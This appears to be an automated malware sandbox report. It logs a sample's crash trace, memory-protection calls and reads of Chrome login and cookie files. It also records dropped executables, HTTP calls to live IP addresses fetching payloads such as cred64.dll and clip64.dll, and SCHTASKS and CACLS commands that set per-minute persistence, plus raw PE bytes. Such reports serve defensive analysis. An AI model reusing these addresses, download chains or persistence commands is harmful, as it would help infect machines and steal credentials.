CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28a803a
registers.esp: 3925376
registers.edi: 3925676
registers.eax: 0
registers.ebp: 3925688
registers.edx: 16824572
registers.ebx: 3928580
registers.esi: 45493708
registers.ecx: 0
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://77.91.68.3/home/love/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.124.31/new/foto135.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.124.31/new/fotod25.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.124.31/anon/an.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.68.3/home/love/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.68.3/home/love/Plugins/clip64.dll
request POST http://77.91.68.3/home/love/index.php
request GET http://77.91.124.31/new/foto135.exe
request GET http://77.91.124.31/new/fotod25.exe
request GET http://77.91.124.31/anon/an.exe
request GET http://77.91.68.3/home/love/Plugins/cred64.dll
request GET http://77.91.68.3/home/love/Plugins/clip64.dll
request POST http://77.91.68.3/home/love/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2584
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2584
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73261000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73261000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef4ee3000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 983040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000b40000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000bb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3faa000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef38c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3911000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3fab000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 1835008
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000cf0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000e30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3912000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3912000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3912000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3912000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3912000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3912000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3912000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3912000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3912000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3912000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3912000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3914000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3914000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3914000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3914000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9419a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9424c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94276000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94250000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe941ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2256000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefeffd000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe942c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe942c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe941bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe941ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe941bd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe941aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe942c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 3252206
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3252206
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3252072
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3252072
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3252004
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3252004
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3250878
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3250878
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3250775
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3250775
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3250511
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3250511
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3250407
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3250407
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\n3861378.exe
file C:\Users\test22\AppData\Local\Temp\IXP005.TMP\outsidevariety.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file C:\Users\test22\AppData\Local\Temp\1000039051\fotod25.exe
file C:\Users\test22\AppData\Local\Temp\1000040051\an.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\c3584474.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\d4057680.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\j9687903.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\a2860925.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\v5161549.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\x6412530.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Local\Temp\IXP004.TMP\k3151030.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\b6900950.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\g8876974.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\h0247653.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\y8069687.exe
file C:\Users\test22\AppData\Local\Temp\IXP004.TMP\l8349481.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\v5218568.exe
file C:\Users\test22\AppData\Local\Temp\1000038051\foto135.exe
file C:\Users\test22\AppData\Local\Temp\IXP005.TMP\outsiidevariety.exe
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
file C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe
file C:\Users\test22\AppData\Local\Temp\1000038051\foto135.exe
file C:\Users\test22\AppData\Local\Temp\1000039051\fotod25.exe
file C:\Users\test22\AppData\Local\Temp\1000040051\an.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe
file C:\Users\test22\AppData\Local\Temp\1000038051\foto135.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\y8069687.exe
file C:\Users\test22\AppData\Local\Temp\1000039051\fotod25.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\n3861378.exe
file C:\Users\test22\AppData\Local\Temp\IXP005.TMP\outsidevariety.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000038051\foto135.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000038051\foto135.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000039051\fotod25.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000039051\fotod25.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000040051\an.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000040051\an.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 1158
family: 0
1 0 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $×â%‡“ƒKԓƒKԓƒKÔöåNՒƒKÔöåHՒƒKÔöåOՇƒKÔöåJՂƒKԓƒJÔ ƒKÔöåC՚ƒKÔöå´Ô’ƒKÔöåIՒƒKÔRich“ƒKÔPELâ`bà  d°`j€@ pP&@Á Œ¢´À$‘`ˆT@ ˆ.textcd `.dataH€h@À.idataR j@@.rsrc À’|@@.relocˆ` @B‚@P‚@¤€@p@ˆ¢@È@u j@°i@@o@àÀ012P4ð4B€IPJÐJ`KÀK LÀLÐLàO€cÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32*...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øœœâ`bprRSDSºÍã÷æÎÍú1‚ òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat .rdata$zzzdbg€8\.text$mn¸r\.xdata$x€à.dataàh.bss ˆ.idata$5ˆ¢.00cfgŒ¢ .idata$2,£.idata$3@£ˆ.idata$4È¥Š .idata$6À.rsrc$01Ä ‰.rsrc$02‹ÿU‹ì3À…Òtúÿÿÿv¸W€…Àx QÿuQèÛë…ÒtÆ]‹ÿU‹ìSVW3ÿ»W€‹÷…Òtúÿÿÿv‹ó…öx?‹ò‹Á…Òt €8t@ƒîuõ‹þ‹Â÷Þö+ǁæ©ÿøó÷ßÿ#ø…öxQÿu+×QÏèn‹ð_‹Æ^[]‹ÿU‹ì‹E V3ö…Àt=ÿÿÿv¾W€…öx5S‹]3öWxÿEPÿuWSÿ|¢@ƒÄ…Àx;Çwu ë¾z€Æ_[ë …Àt‹MÆ‹Æ^]ËÿU‹ì…Òt&‹E SV¾þÿÿ+Á…ötŠ„Ût ˆANƒêuì^[…ÒuI÷ÚÆҁâ†ÿø‚z€] ‹ÿU‹ì9Mr‹Eº+Á;Âw+M ë3À]‹ÿU‹ìƒì¡€@3ʼnEüSVW3ÀfÇEø‹ñ‰EôhD@‰uè‹Øÿx @‹ø…ÿtjhT@Wÿœ @‰Eð…ÀtP3ɍEìPQQQQQQh j jEô‰PCÿ$ @…Àt*‹Mð‹ôÿuèÿuìjÿˆ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @‹Mü‹Ã_^3Í[èAT‹å]ËÿU‹ìƒì¡€@3ʼnEü¡(@SWj3ÛfÇEø_‰]ô‰]ð;Ç…ôMðèÿÿÿ…À…ӍEèPjÿ¡@Pÿ @…À„ɍEìPSSWÿuèÿ @…À…’ÿl @ƒøz…ƒVÿuìSÿP¡@‹ð…ötqEìPÿuìVWÿuèÿ @…ÀtTEäPSSSSSSh j WEôPÿ$ @…Àt49v'~ÿuäÿ7ÿ, @…Àu CƒÇ;réë 3À@£(@‰Eðÿuäÿ @Vÿ¤ @^ÿuèÿˆ @‹Eðë‹Eð…Àt Ç(@‹Mü_3Í[è S‹å]ÃÌÌÌÌÌÌ̋ÿU‹ìì¡€@3ʼnEü‹E V‹u-t!ƒèu‹UŠÃ÷ÿÿƒùw RVÿà¡@ëP3ÀëOÿÌ¡@‹Ð‹Îè)h…üýÿÿƅüýÿÿPÿuÿ5<š@ÿè¡@…üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@‹Mü3Í^èbR‹å]‹ÿU‹ìQS‹Á‹ÚVW‰Eü3ÿ‹0ë€>tFf¾‹ËèÔK…Àuë‹Eüf¾‰0ë3Àë#€<7tGf¾7‹Ëè®K…Àté7€8tÆ@_^[‹å]ËÿU‹ìì¡€@3ʼnEü‹EºSV‹Ù‰…èùÿÿ‹E ôýÿÿWS‰…ìùÿÿè[ûÿÿ€½ôýÿÿ"u ºl@…õýÿÿë ºp@…ôýÿÿðùÿÿ‰…ðùÿÿè-ÿÿÿ‹µðùÿÿ‹ø…öt<‹ÎQŠA„Àuù+ʃùr)ŠF<:u€~\t €>\u<\uVºøþÿÿèãúÿÿë(Qhä‘@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.Z‹Îè÷J…À„šjÿht@jÿPjjÿh @Hƒè…|…øþÿÿPÿ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $×â%‡“ƒKԓƒKԓƒKÔöåNՒƒKÔöåHՒƒKÔöåOՇƒKÔöåJՂƒKԓƒJÔ ƒKÔöåC՚ƒKÔöå´Ô’ƒKÔöåIՒƒKÔRich“ƒKÔPELâ`bà  d²`j€@ p-%@Á Œ¢´À’`ˆT@ ˆ.textcd `.dataH€h@À.idataR j@@.rsrc À”|@@.relocˆ` @B‚@P‚@¤€@p@ˆ¢@È@u j@°i@@o@àÀ012P4ð4B€IPJÐJ`KÀK LÀLÐLàO€cÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32*...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string 